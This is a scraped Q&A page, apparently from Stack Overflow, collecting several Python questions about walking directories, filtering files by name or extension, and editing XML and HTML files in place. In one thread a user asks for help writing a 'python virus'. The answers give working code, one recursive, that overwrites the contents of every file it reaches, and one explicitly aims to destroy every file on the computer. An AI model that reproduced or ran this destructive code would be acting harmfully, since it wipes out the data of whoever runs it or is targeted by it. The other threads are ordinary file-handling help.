get files from a directory that starts with specific characters - python

I am having this path c:\testfolder\myfolder\
And inside this folder i got these folders:
gr432d4dr
fr34q2sf4fd
grdddxwes
pl34scc
us4352fc
us4245
gr00mis
us994k
These folders contain cpp files inside.
What i want is to search ONLY from the folders that starts with gr and us
Here is my code which tried to search the specific folders:
def search():
for filename in Path('c:\testfolder\myfolder\').glob('**/*.cpp') :
with open(filename) as f:
if "gr" or "us" in f:
#do something
I put a print to see but seems like it's still checking all the folders

f is not the filename, is the file object resource which let you access the file content. You must check the filename before opening the file.
def search():
for filename in Path(r'c:\testfolder\myfolder\').glob('**/*.cpp') :
if "gr" in os.fspath(filename) or "us" in os.fspath(filename):
with open(filename) as f:
#do something
You need os.fspath to get back a string from a Path object in order to use the in operator to search for a substring in the string.
Also note the if condition I've edited. Should be written in this way.

Related

In Python, how do I create a list of files based on specified file extensions?

Let's say I have a folder with a bunch of files (with different file extensions). I want to create a list of files from this folder. However, I want to create a list of files with SPECIFIC file extensions.
These file extensions are categorized into groups.
File Extensions: .jpg, .png, .gif, .pdf, .raw, .docx, .pptx, .xlsx, .js, .html, .css
Group "image" contains .jpg, .png, .gif.
Group "adobe" contains .pdf, .raw. (yes, I'm listing '.raw' as an adobe file for this example :P)
Group "microsoft" contains .docx, .pptx, .xlsx.
Group "webdev" contains .js, .html, .css.
I want to be able to add these files types to a list. That list will be generated in a ".txt" file and would contain ALL files with the chosen file extensions.
So if my folder has 5 image files, 10 adobe files, 5 microsoft files, 3 webdev files and I select the "image" and "microsoft" groups, this application in Python would create a .txt file that contains a list of filenames with file extensions that belong only in the image and microsoft groups.
The text file would have a list like below:
picture1.jpg
picture2.png
picture3.gif
picture4.jpg
picture5.jpg
powerpoint.pptx
powerpoint2.pptx
spreadsheet.xlsx
worddocument.docx
worddocument2.docx
As of right now, my code creates a text file that generates a list of ALL files in a specified folder.
I could use an "if" statement to get specific file extension, but I don't think this achieves the results I want. In this case, I would have to create a function for each Group (i.e. function for the image, adobe, microsoft and webdev groups). I want to be able to combine these groups freely (i.e. image and microsoft files in a list).
Example of an "if" statement:
for elem in os.listdir(filepath):
if elem.endswith('.jpg'):
listItem = elem + '\n'
listName = filepath + (r"\{}List.txt".format(name))
writeFile = open(listName, 'a')
writeFile.write(listItem)
writeFile.close()
if elem.endswith('.png'):
listItem = elem + '\n'
listName = filepath + (r"\{}List.txt".format(name))
writeFile = open(listName, 'a')
writeFile.write(listItem)
writeFile.close()
if elem.endswith('.gif'):
listItem = elem + '\n'
listName = filepath + (r"\{}List.txt".format(name))
writeFile = open(listName, 'a')
writeFile.write(listItem)
writeFile.close()
else:
continue
Full code without the "if" statement (generates a .txt file with all filenames from a specified folder):
import os
def enterFilePath():
global filepath
filepath = input("Please enter your file path. ")
os.chdir(filepath)
enterFilePath()
def enterFileName():
global name
global listName
name = str(input("Name the txt file. "))
listName = name + ".txt"
enterFileName()
def listGenerator():
for filename in os.listdir(filepath):
listItem = filename + ' \n'
listName = filepath + (r"\{}List.txt".format(name))
writeFile = open(listName, 'a')
writeFile.write(listItem)
writeFile.close()
listGenerator()
A pointer before getting into the answer - avoid using global in favor of function parameters and return values. It will make debugging significantly less of a headache and make it easier to follow data flow through your program.
nostradamus is correct in his comment, a dict will be the ideal way to solve your problem here. I've also done similar things as your issue before using itertools.chain.from_iterable and pathlib.Path, which I'll be using here.
First, the dict:
groups = {
'image': {'jpg', 'png', 'gif'},
'adobe': {'pdf', 'raw'},
'microsoft': {'docx', 'pptx', 'xlsx'},
'webdev': {'js', 'html', 'css'}
}
This sets up your extension groups that you mentioned, which you can then access easily with groups['image'], groups['adobe'], etc.
Then, using the Path.glob method, itertools.chain.from_iterable, and a comprehension, you can get your list of desired files in a single statement (or function).
# Set up some variables
target_groups = ['adobe', 'webdev']
# Initialize generator
files = chain.from_iterable(
# Glob pattern for the current extension
Path(filepath).glob(f'*.{ext}')
# Each group in target_groups
for group in target_groups
# Each extension in current group
for ext in groups[group]
)
# Then, just iterate the files
for fpath in files:
# Do stuff with file here
print(fpath.name)
My test directory has one file of each extension you listed, named a, b, etc for each group. Using the above code, my output is:
a.pdf
b.raw
a.js
b.html
c.css
The way the file list/generator is set up means that the list of files will be sorted by extension-group, then by extension, and then by name. If you want to change what groups are being listed, just add/remove values in the target_groups list above (works with a single option as well).
You'll also want to consider parameterizing your targets, such as through input or script arguments, as well as handling cases where a requested group doesn't exist in the groups dictionary. The code above would probably also be more useful as a function, but I'll leave that implementation up to you :)

Check if any part of string is contained within Text File

Here is my code:
for r, d, f in os.walk(path):
for folder in d:
folders.append(os.path.join(r, folder))
for f in folders:
with open('search.txt') as file:
contents = file.read()
if f in contents:
print ('word found')
I'm having the script search through a given directory, and compare the name of the paths to a Text Files full of Virus Definitions. I'm trying to get the script to recognise if the name of the file is contained within said text file.
Problem I've found as you can see from the code, it will only work with a complete match, and as it takes the path as the string (for example; "C:/test/virus.bat") it will never match.
Is it possible to adjust this code so that any part of the path can be matched against the text file?
Not sure if that makes sense, any suggestions welcome or please say if not clear.
EDIT:
To be more clear, here is a logic version of what I am trying to achieve:
List all Files in Directory
Get file name within path name ("virus" within "C:/test/virus")
Check if file name is contained within Text File
You can use the following to get all files in a given path:
files = []
for r, d, f in os.walk(path):
for folder in d:
if f:
for file in f:
files.append(os.path.join(r, folder, file).replace('\\', '/'))
then slightly modify your code to achieve the result. You want to check if the content of the file is in the given file path, not vice versa -> if content in f:
for f in files:
with open('search.txt', 'r') as file:
content = file.read()
if content in f:
print('Found')

Searching a folder structure and modifying XML files using Python

I am trying to create a python script that will iterate through a folder structure, find folders named 'bravo', and modify the xml files contained within them.
In the xml files, I want to modify the 'location' attribute of a tag, called 'file'. Such as:
<file location="e:\one\two"/>
I just need to change the drive letter of the file path from ‘e’ to ‘f’. So that it will read:
<file location="f:\one\two"/>
However...
The name of these xml files are unique, so I cannot search for the exact xml file name. Instead I am searching by the xml file type.
Also, there are other xml files in my folder structure, without the ‘file’ tag reference, that I wish to ignore.
The only constant is that the xml files I want to modify are all stored in folders named, ‘bravo’.
I also wish to create a log file that lists all the xml files and their filepaths which have successfully been updated (and preferably the ones that failed).
Using answers to similar questions on this site, I have cobbled together the following script.
In its current state, the script trys to modify every xml files it finds. I have not been able to successfully add code that only searches folders called, ‘bravo'.
When the script modifies an xml file, not in a 'bravo' folder, it errors because these files do not contain a 'file' tag.
Please could someone help me to correct my script (or create a new one).
Here is an example of the folder structure...
My folder structure
And my script so far...
from xml.dom import minidom
import os
# enter the directory where to start search for xml files...
for root, dirs, files in os.walk("c:/temp"):
for file in files:
#search for xml files...
if file.endswith(".xml"):
xml_file = file
xmldoc = minidom.parse(os.path.join(root, xml_file))
# in the xml file look for tag called "file"...
file_location = xmldoc.getElementsByTagName("file")
# i don't understand the next line of code, but it's needed
file_location = file_location[0]
# 'location_string' is a variable for the 'location' path of the file tag in the xml document
location_string = (file_location.attributes["location"].value)
# the new drive letter is added to the location_string to create 'new_location'
new_location = "f" + location_string[1:]
# replace the 'location' value of the file tag with the new location...
file_location.attributes["location"].value = new_location
# write the change to the original file
with open((os.path.join(root, xml_file)),'w') as f:
f.write(xmldoc.toxml())
print "%s has been updated!" % (os.path.join(root, xml_file))
# add updated file name to log...
log_file = open("filepath_update_log.txt", "a")
log_file.write("%s\n" % (os.path.join(root, xml_file)))
log_file.close
Test if the directory name fits, before your second loop. You'd have to get the last directory in the path first. As in: How to get only the last part of a path in Python?
if os.path.basename(os.path.normpath(root)) == "bravo":
You could use the https://docs.python.org/3/library/logging.html module for logging.
If you only want to replace a single letter, then maybe you can directly replace it instead of parsing xml. As suggested in: https://stackoverflow.com/a/17548459/7062162
def inplace_change(filename, old_string, new_string):
# Safely read the input filename using 'with'
with open(filename) as f:
s = f.read()
if old_string not in s:
print('"{old_string}" not found in {filename}.'.format(**locals()))
return
# Safely write the changed content, if found in the file
with open(filename, 'w') as f:
print('Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals()))
s = s.replace(old_string, new_string)
f.write(s)

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How to confirm only html files exist in a given folder and if not then how to prompt the user to specify a folder with only html files within

I would like to create a python script that will do 3 things: 1) Take user input to navigate to a file directory2) Confirm the file contents (a particular set of files need to be in the folder for the script to proceed)3) Do a Find and Replace
The Code as of now:
import os, time
from os.path import walk
mydictionary = {"</i>":"</em>"}
for (path, dirs, files) in os.walk(raw_input('Copy and Paste Course Directory Here: ')):
for f in files:
if f.endswith('.html'):
filepath = os.path.join(path,f)
s = open(filepath).read()
for k, v in mydictionary.iteritems(): terms for a dictionary file and replace
s = s.replace(k, v)
f = open(filepath, 'w')
f.write(s)
f.close()
Now i Have parts 1 and 3, I just need part 2.
for part 2 though I need to confirm that only html files exist in the directory the the user will specified otherwise the script will prompt the user to enter the correct folder directory (which will contain html files)
Thanks
From what I understand, here's your pseudocode:
Ask user for directory
If all files in that directory are .html files:
Do the search-and-replace stuff on the files
Else:
Warn and repeat from start
I don't think you actually want a recursive walk here, so first I'll write that with a flat listing:
while True:
dir = raw_input('Copy and Paste Course Directory Here: ')
files = os.listdir(dir)
if all(file.endswith('.html') for file in files):
# do the search and replace stuff
break
else:
print 'Sorry, there are non-HTML files here. Try again.'
Except for having the translate the "repeat from start" into a while True loop with a break, this is almost a word-for-word translation from the English pseudocode.
If you do need the recursive walk through subdirectories, you probably don't want to write the all as a one-liner. It's not that hard to write "all members of the third member of any member of the os.walk result end with '.html'", but it will be hard to read. But if you turn that English description into something more understandable, you should be able to see how to turn it directly into code.

Categories

Resources